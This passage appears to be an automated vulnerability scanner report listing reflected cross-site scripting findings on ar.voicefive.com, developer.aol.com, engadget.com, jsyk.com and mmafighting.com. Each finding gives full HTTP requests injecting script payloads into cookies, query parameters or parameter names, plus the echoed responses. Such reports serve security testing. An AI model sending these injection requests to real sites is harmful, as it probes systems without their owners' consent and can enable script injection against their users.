Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&5becf<script>alert(1)</script>85729a22e32; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
r 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&5becf<script>alert(1)</script>85729a22e32', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

5.231. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload fc0a6<script>alert(1)</script>d6163573ab8 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&fc0a6<script>alert(1)</script>d6163573ab8; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&fc0a6<script>alert(1)</script>d6163573ab8=&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&fc0a6<script>alert(1)</script>d6163573ab8', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "ar_s_p81479006": '1', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 201
...[SNIP]...

5.232. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload d4cb0<script>alert(1)</script>579600faeb2 was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1d4cb0<script>alert(1)</script>579600faeb2; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
Exp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "ar_s_p81479006": '1d4cb0<script>alert(1)</script>579600faeb2', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:
...[SNIP]...

5.233. http://developer.aol.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developer.aol.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1014e"><script>alert(1)</script>19aa03eba79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?1014e"><script>alert(1)</script>19aa03eba79=1 HTTP/1.1
Host: developer.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304610976566-Repeat%7C1367682976566%3B%20s_nrgvo%3DRepeat%7C1367682976568%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 11:10:45 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 11:40:45 GMT
Content-length: 131
Content-type: text/html
Location: http://dev.aol.com/?1014e"><script>alert(1)</script>19aa03eba79=1

<html>
<body>
Page relocated <a href="http://dev.aol.com/?1014e"><script>alert(1)</script>19aa03eba79=1">here.</a>
</body>
</html>

5.234. http://engadget.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://engadget.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a375"><script>alert(1)</script>5b25a3ca0a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?9a375"><script>alert(1)</script>5b25a3ca0a2=1 HTTP/1.1
Host: engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 10:53:01 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 11:23:01 GMT
Content-length: 136
Content-type: text/html
Location: http://www.engadget.com/?9a375"><script>alert(1)</script>5b25a3ca0a2=1
Keep-Alive: timeout=5, max=33
Connection: Keep-Alive

<html>
<body>
Page relocated <a href="http://www.engadget.com/?9a375"><script>alert(1)</script>5b25a3ca0a2=1">here.</a>
</body>
</html>

5.235. http://jsyk.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jsyk.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba5ed"><script>alert(1)</script>9ef0ad39b64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?ba5ed"><script>alert(1)</script>9ef0ad39b64=1 HTTP/1.1
Host: jsyk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 10:53:16 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 11:23:16 GMT
Content-length: 132
Content-type: text/html
Location: http://www.jsyk.com/?ba5ed"><script>alert(1)</script>9ef0ad39b64=1
Keep-Alive: timeout=5, max=51
Connection: Keep-Alive

<html>
<body>
Page relocated <a href="http://www.jsyk.com/?ba5ed"><script>alert(1)</script>9ef0ad39b64=1">here.</a>
</body>
</html>

5.236. http://mmafighting.com/traffic/ [bv parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mmafighting.com
Path:	/traffic/

Issue detail

The value of the bv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c8c6"><script>alert(1)</script>ece380801f8 was submitted in the bv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=2c8c6"><script>alert(1)</script>ece380801f8&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:33 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:33 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=2c8c6"><script>alert(1)</script>ece380801f8&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=2c8c6"><script>alert(1)</script>ece380801f8&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365">
...[SNIP]...

5.237. http://mmafighting.com/traffic/ [cb parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mmafighting.com
Path:	/traffic/

Issue detail

The value of the cb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60895"><script>alert(1)</script>7b903dcee7f was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=151490236560895"><script>alert(1)</script>7b903dcee7f HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:34 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:34 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=151490236560895"><script>alert(1)</script>7b903dcee7f

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=151490236560895"><script>alert(1)</script>7b903dcee7f">
...[SNIP]...

5.238. http://mmafighting.com/traffic/ [lg parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mmafighting.com
Path:	/traffic/

Issue detail

The value of the lg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57334"><script>alert(1)</script>a636181c04a was submitted in the lg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=&os=19931900&tz=&lg=57334"><script>alert(1)</script>a636181c04a&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:33 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:33 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=57334"><script>alert(1)</script>a636181c04a&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=57334"><script>alert(1)</script>a636181c04a&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365">
...[SNIP]...

5.239. http://mmafighting.com/traffic/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mmafighting.com
Path:	/traffic/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2bc9"><script>alert(1)</script>b63b0b4b97c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365&e2bc9"><script>alert(1)</script>b63b0b4b97c=1 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:34 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:34 GMT
Content-length: 355
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365&e2bc9"><script>alert(1)</script>b63b0b4b97c=1

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365&e2bc9"><script>alert(1)</script>b63b0b4b97c=1">
...[SNIP]...

5.240. http://mmafighting.com/traffic/ [os parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mmafighting.com
Path:	/traffic/

Issue detail

The value of the os request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afc84"><script>alert(1)</script>6f0b38780b0 was submitted in the os parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=&os=19931900afc84"><script>alert(1)</script>6f0b38780b0&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:33 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:33 GMT
Content-length: 352
Content-type: text/html
